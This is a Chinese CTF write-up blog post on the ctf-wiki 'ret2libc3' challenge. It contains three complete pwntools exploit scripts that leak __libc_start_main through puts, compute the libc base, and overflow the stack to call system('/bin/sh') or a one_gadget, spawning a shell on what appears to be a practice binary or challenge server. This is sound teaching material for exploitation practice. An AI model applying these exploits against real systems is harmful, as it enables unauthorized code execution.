Fork me on GitHub
pikachu's Blog

ret2libc3

 • ctf-wikiret2libc3
 • 没有 system/bin/sh ,泄漏 libc

Analyse

 • 泄漏 _start 地址
 • 获取 libc 版本
 • 获取 system/bin/sh 地址
 • 再次执行源程序
 • 触发栈溢出执行 system('/bin/sh')

Exp 1

 • 自己写的 exp ,根据泄漏的地址先找到 libc
 • 到返回地址的偏移可使用 cyclic 快速判断
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  23
  24
  25
  26
  27
  28
  29
  30
  31
  32
  33
  34
  35
  36
  37
  38
  39
  40
  41
  42
  43
  44
  45
  46
  47
  48
  49
  50
  51
  52
  53
  54
  55
  56
  57
  58
  59
  60
  61
  62
  63
  64
  65
  66
  67
  68
  69
  70
  71
  72
  73
  from pwn import *

  local=1
  pc='./ret2libc3'
  aslr=True
  context.log_level=True
  #context.terminal = ["deepin-terminal","-x","sh","-c"]

  libc=ELF('./libc6_2.27-3ubuntu1.2_i386.so')
  ret2libc3 = ELF('./ret2libc3')

  if local==1:
  #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
  p = process(pc,aslr=aslr)
  #gdb.attach(p,'c')
  else:
  remote_addr=['111.198.29.45', 39802]
  p=remote(remote_addr[0],remote_addr[1])

  ru = lambda x : p.recvuntil(x)
  rud = lambda x : p.recvuntil(x ,drop=True)
  sn = lambda x : p.send(x)
  rl = lambda : p.recvline()
  sl = lambda x : p.sendline(x)
  rv = lambda x : p.recv(x)
  sa = lambda a,b : p.sendafter(a,b)
  sla = lambda a,b : p.sendlineafter(a,b)
  pi = lambda : p.interactive()

  def dbg(b =""):
  gdb.attach(io , b)
  raw_input()

  def lg(s, addr):
  log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))

  def raddr(a=6):
  if(a==6):
  return u64(rv(a).ljust(8,'\x00'))
  else:
  return u64(rl().strip('\n').ljust(8,'\x00'))

  if __name__ == '__main__':
  puts_plt = ret2libc3.plt['puts']
  libc_start_main_got = ret2libc3.got['__libc_start_main']
  start_addr = ret2libc3.symbols['_start']
  lg('start_addr',start_addr)

  payload = 'a' * 112
  payload += p32(puts_plt)
  payload += p32(start_addr)
  payload += p32(libc_start_main_got)
  payload += '\x00'
  sl(payload)

  ru('Can you find it !?')
  libc_start_main_addr = u32(p.recv()[0:4])
  lg('libc_start_main_addr',libc_start_main_addr)

  distance = libc.symbols['system'] - libc.symbols['__libc_start_main']
  lg('distance', distance)
  libc_base_addr = libc_start_main_addr - libc.symbols['__libc_start_main']
  system_addr = libc_base_addr + libc.symbols['system']
  binsh_addr = libc_base_addr + libc.search("/bin/sh").next()
  lg('system_addr', system_addr)
  lg('binsh_addr', binsh_addr)

  payload = 'a' * 112
  payload += p32(system_addr)
  payload += p32(0xdeadbeef)
  payload += p32(binsh_addr)
  sl(payload)
  pi()

Exp 2

 • 先泄漏 libc ,然后使用 one_gadget
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  23
  24
  25
  26
  27
  28
  29
  30
  31
  32
  33
  34
  35
  36
  37
  38
  39
  40
  41
  42
  43
  44
  45
  46
  47
  48
  49
  50
  51
  52
  53
  54
  55
  56
  57
  58
  59
  60
  61
  62
  63
  64
  65
  66
  67
  68
  69
  70
  71
  72
  from pwn import *

  local=1
  pc='./ret2libc3'
  aslr=True
  context.log_level=True
  #context.terminal = ["deepin-terminal","-x","sh","-c"]

  libc=ELF('./libc6_2.27-3ubuntu1.2_i386.so')
  ret2libc3 = ELF('./ret2libc3')

  if local==1:
  #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
  p = process(pc,aslr=aslr)
  #gdb.attach(p,'c')
  else:
  remote_addr=['111.198.29.45', 39802]
  p=remote(remote_addr[0],remote_addr[1])

  ru = lambda x : p.recvuntil(x)
  rud = lambda x : p.recvuntil(x ,drop=True)
  sn = lambda x : p.send(x)
  rl = lambda : p.recvline()
  sl = lambda x : p.sendline(x)
  rv = lambda x : p.recv(x)
  sa = lambda a,b : p.sendafter(a,b)
  sla = lambda a,b : p.sendlineafter(a,b)
  pi = lambda : p.interactive()

  def dbg(b =""):
  gdb.attach(io , b)
  raw_input()

  def lg(s, addr):
  log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))

  def raddr(a=6):
  if(a==6):
  return u64(rv(a).ljust(8,'\x00'))
  else:
  return u64(rl().strip('\n').ljust(8,'\x00'))

  if __name__ == '__main__':
  puts_plt = ret2libc3.plt['puts']
  libc_start_main_got = ret2libc3.got['__libc_start_main']
  start_addr = ret2libc3.symbols['_start']
  lg('start_addr',start_addr)

  payload = 'a' * 112
  payload += p32(puts_plt)
  payload += p32(start_addr)
  payload += p32(libc_start_main_got)
  sl(payload)

  ru('Can you find it !?')
  libc_start_main_addr = u32(p.recv()[0:4])
  lg('libc_start_main_addr',libc_start_main_addr)

  libc_base_addr = libc_start_main_addr - libc.symbols['__libc_start_main']
  one_gadget = libc_base_addr + 0x3d130

  payload = 'a' * 112
  payload += p32(one_gadget)
  sl(payload)
  pi()

  """
  0x3d130 execve("/bin/sh", esp+0x40, environ)
  constraints:
  esi is the GOT address of libc
  [esp+0x40] == NULL
  """

Exp 3

 • 网上找的另一个版本使用 LibcSearcher 泄漏 libc
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  23
  24
  25
  26
  27
  28
  ##coding=utf-8
  from pwn import *
  from LibcSearcher import LibcSearcher

  context.binary='ret2libc3'
  sh = process('./ret2libc3')

  ret2libc3 = ELF('./ret2libc3')
  puts_plt = ret2libc3.plt['puts']
  libc_start_main_got = ret2libc3.got['__libc_start_main']
  main = ret2libc3.symbols['_start']
  print("leak main_got addr and return main")

  payload = flat(['A'*112,puts_plt,main,libc_start_main_got])
  sh.sendlineafter('Can you find it !?',payload)

  libc_start_main_addr = u32(sh.recv()[0:4])
  print(hex(libc_start_main_addr))

  libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
  libcbase = libc_start_main_addr-libc.dump('__libc_start_main')
  system_addr = libcbase+libc.dump('system')
  binsh_addr = libcbase +libc.dump('str_bin_sh')

  print("now get shell")
  payload = flat(['A'*112,system_addr,'A'*4,binsh_addr])
  sh.send(payload)
  sh.interactive()
---------------- The End ----------------
谢谢大爷~

Author:pikachu
Link:https://hitcxy.com/2020/ret2libc3/
Contact:hitcxy.cn@gmail.com
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布
转载请注明出处,谢谢!